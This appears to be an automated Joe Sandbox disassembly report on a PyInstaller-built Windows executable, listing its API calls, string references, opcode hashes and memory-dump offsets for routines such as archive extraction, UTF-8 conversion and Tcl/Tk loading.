• String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-2208601799
                                                                                                                                                                      • Opcode ID: e6820c89ffc797338b1e8a8d4cbcd85ec8fabaf342805483d76abf8d02486c55
                                                                                                                                                                      • Instruction ID: c24ae280751bfbf10a5953f8bc46721c48467def050e6e8cf8400a57a8b82855
                                                                                                                                                                      • Opcode Fuzzy Hash: e6820c89ffc797338b1e8a8d4cbcd85ec8fabaf342805483d76abf8d02486c55
                                                                                                                                                                      • Instruction Fuzzy Hash: 26E1B0A4E4EB0390FB59DB15EC5857463E6AF18794F885035C82E863A9EF7CF568B300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message_fread_nolock
                                                                                                                                                                      • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 3065259568-2316137593
                                                                                                                                                                      • Opcode ID: c5a2c1d02429908984cb2a7410400eb3092e6fd9a18cd193dcde8c91d8c94b8a
                                                                                                                                                                      • Instruction ID: 89751dfa800bfa3152dd623e5241c310b804d97e9920daa0903b033b23253dc3
                                                                                                                                                                      • Opcode Fuzzy Hash: c5a2c1d02429908984cb2a7410400eb3092e6fd9a18cd193dcde8c91d8c94b8a
                                                                                                                                                                      • Instruction Fuzzy Hash: 8251A272F0968346FB20A721A8516FA63A4EF447C4F805031EE5DD7B8AEE7CE945E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                      • String ID: P%
                                                                                                                                                                      • API String ID: 2147705588-2959514604
                                                                                                                                                                      • Opcode ID: 3a5fe543bfe1b7b5f8464788b1726589a381fe5977aa523128c49ed64eb0cea2
                                                                                                                                                                      • Instruction ID: 0cf9eefb627f5e71c1a5010a9dc794792bdfa451dd4aee713e6db57297f37842
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a5fe543bfe1b7b5f8464788b1726589a381fe5977aa523128c49ed64eb0cea2
                                                                                                                                                                      • Instruction Fuzzy Hash: B151C876A187A186E7349F26A4181BAB7A1FB98B61F004135EFDE83794DF3CD085DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                      • Opcode ID: 91dceeff07302928ce321c951f00c79f44960f322cb111e7c2f38567437031ff
                                                                                                                                                                      • Instruction ID: efce9e36e3c0065a7891649569de4de3a82a7ed336bbb7df2ee4b04fc7d5b784
                                                                                                                                                                      • Opcode Fuzzy Hash: 91dceeff07302928ce321c951f00c79f44960f322cb111e7c2f38567437031ff
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E12A1F3E4C34386FF209A15D1542BA76A1EB40754F84A135E68A877C4DF3DEE90AB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                      • Opcode ID: 57be4d3235f3c7e7fe9cc3e0119ba00d32c026717cad99bda61a19a4716f3002
                                                                                                                                                                      • Instruction ID: d91d82647ba3b379cf16e8491b637dabb3a313458bde9b280da587177a1ebc40
                                                                                                                                                                      • Opcode Fuzzy Hash: 57be4d3235f3c7e7fe9cc3e0119ba00d32c026717cad99bda61a19a4716f3002
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A12A363E0C34386FF609A54D0546BAF6A2FB40754F885135E69A867C4DF7CEE80AF60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                      • API String ID: 2030045667-3659356012
                                                                                                                                                                      • Opcode ID: d99f9d24bbdf0239836503ea78f40cd922292515af28383286336b1a69721e40
                                                                                                                                                                      • Instruction ID: b0073a057cd155cbe295ab5f8ba3464a3402007798de45b0271fdd14f0cdb0b1
                                                                                                                                                                      • Opcode Fuzzy Hash: d99f9d24bbdf0239836503ea78f40cd922292515af28383286336b1a69721e40
                                                                                                                                                                      • Instruction Fuzzy Hash: DD319262F0C68386FB24DB51E4405BA63A0EF447D4F885031EE4D97B99EE3CE546E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                      • Opcode ID: 9909e2f83e20015404d87d33da3216204588829881f8faf41da18fa3cf6f00f4
                                                                                                                                                                      • Instruction ID: 6afdc91cc7264e5459369ab46440c870da95aaa9114d19a318918b261e15fa93
                                                                                                                                                                      • Opcode Fuzzy Hash: 9909e2f83e20015404d87d33da3216204588829881f8faf41da18fa3cf6f00f4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DE18B72E09B418AFB209B65D4802AD7BA4FF45B88F000535EE8D87B99DF38E4A1D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D86F7
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D874E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 626452242-27947307
                                                                                                                                                                      • Opcode ID: a50a3382255a541c5b3d0560de10b3a042d6b3b0c1d5a170ef61a2fd4a810dcd
                                                                                                                                                                      • Instruction ID: 2f1f5e0dbfe634f8b8c16e6c5e2b58e04f17efaee505bcde1435e7f0ac595767
                                                                                                                                                                      • Opcode Fuzzy Hash: a50a3382255a541c5b3d0560de10b3a042d6b3b0c1d5a170ef61a2fd4a810dcd
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C416D32A08B8282F720DF15B84017AB6A1FF88B90F554135EA9DC7BA4DF3CE456E700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D8BE1
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00007FF6313D399A), ref: 00007FF6313D8C55
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                      • API String ID: 3723044601-27947307
                                                                                                                                                                      • Opcode ID: a488ca790df3690b379957bbac8251e95929e4a53950f3e8fd867653a66a7dcb
                                                                                                                                                                      • Instruction ID: b12456d866014b28d8b9b8fc3fa9c3bdac6623b421eab79e6aa25860f8c37859
                                                                                                                                                                      • Opcode Fuzzy Hash: a488ca790df3690b379957bbac8251e95929e4a53950f3e8fd867653a66a7dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E215762E09B42C5FB10DF26AC44179B7A1EF88BD0B584135DA5DC37A4EF3CE556A340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                      • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                      • API String ID: 3231891352-3501660386
                                                                                                                                                                      • Opcode ID: 68fd338641d636d5815f3b665ffc9053a51abf66e87a31f69d250664ace4db6a
                                                                                                                                                                      • Instruction ID: 5926e21effe1d4530386595cfc3004913d9b3a1f0d39ad72d05e51c57f94c1a7
                                                                                                                                                                      • Opcode Fuzzy Hash: 68fd338641d636d5815f3b665ffc9053a51abf66e87a31f69d250664ace4db6a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A51BF61F0D24341FB20AB26A9503F962959F85BD8F485431EE5DCB7DAEE3CE904A350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6313D8A90: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6313D7951,00000000,?,00000000,00000000,?,00007FF6313D154F), ref: 00007FF6313D742F
                                                                                                                                                                        • Part of subcall function 00007FF6313D2AD0: MessageBoxW.USER32 ref: 00007FF6313D2BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6313D7443
                                                                                                                                                                      • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6313D7406
                                                                                                                                                                      • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6313D748A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                      • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                      • API String ID: 1662231829-3498232454
                                                                                                                                                                      • Opcode ID: e5ac64639ba5b6db894796e8b343d4fc1853aedb28ed0cb5364be08b25f1faa7
                                                                                                                                                                      • Instruction ID: 109c7812a4489b8d693f2305dad419b3ff68022c417f8a36b5d36216e4ccfa1d
                                                                                                                                                                      • Opcode Fuzzy Hash: e5ac64639ba5b6db894796e8b343d4fc1853aedb28ed0cb5364be08b25f1faa7
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B319051F1D78380FB25AB21E9153BA6291AF987C4F844435DA4ED27DAEE3CE608A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDDED
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDDFB
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDE25
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDE6B
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6313DE01A,?,?,?,00007FF6313DDD0C,?,?,00000001,00007FF6313DD929), ref: 00007FF6313DDE77
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: ac8a44a14b46c097b1296329a08db6903c175b988a0b8256de00bf94bd10a686
                                                                                                                                                                      • Instruction ID: 64208e197f72ed23f0b6cd7e5e09e5ecb3b59f980becef6bb6e7615f191efe66
                                                                                                                                                                      • Opcode Fuzzy Hash: ac8a44a14b46c097b1296329a08db6903c175b988a0b8256de00bf94bd10a686
                                                                                                                                                                      • Instruction Fuzzy Hash: 2131A161E1A742D1FF629B02AC006B973D4BF58BA0F5A0535DE2E8B794EF3CE444A300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8ACA
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6313D87A2,?,?,?,?,?,?,?,?,?,?,?,00007FF6313D101D), ref: 00007FF6313D29B4
                                                                                                                                                                        • Part of subcall function 00007FF6313D2980: MessageBoxW.USER32 ref: 00007FF6313D2A90
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6313D2A5B), ref: 00007FF6313D8B50
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLastMessage
• String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
• API String ID: 3723044601-876015163
• Opcode ID: 944b3e78a2d47948098f3552073c1d159f1f12c7710ab7850aeac045bdb34f75
• Instruction ID: e1979b169bec1140b3309e321645fa19b57aebe48e9af7fae6810ffd3a514a89
• Opcode Fuzzy Hash: 944b3e78a2d47948098f3552073c1d159f1f12c7710ab7850aeac045bdb34f75
• Instruction Fuzzy Hash: AF215E62F08A4281FB50DB2AF804079A3A1FF887C4F584131EB5CC3BA9EE3CE5519704
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: fe1e638170c73c8358d48f427b911bbbc02c139701cf0732f1db1911624686f5
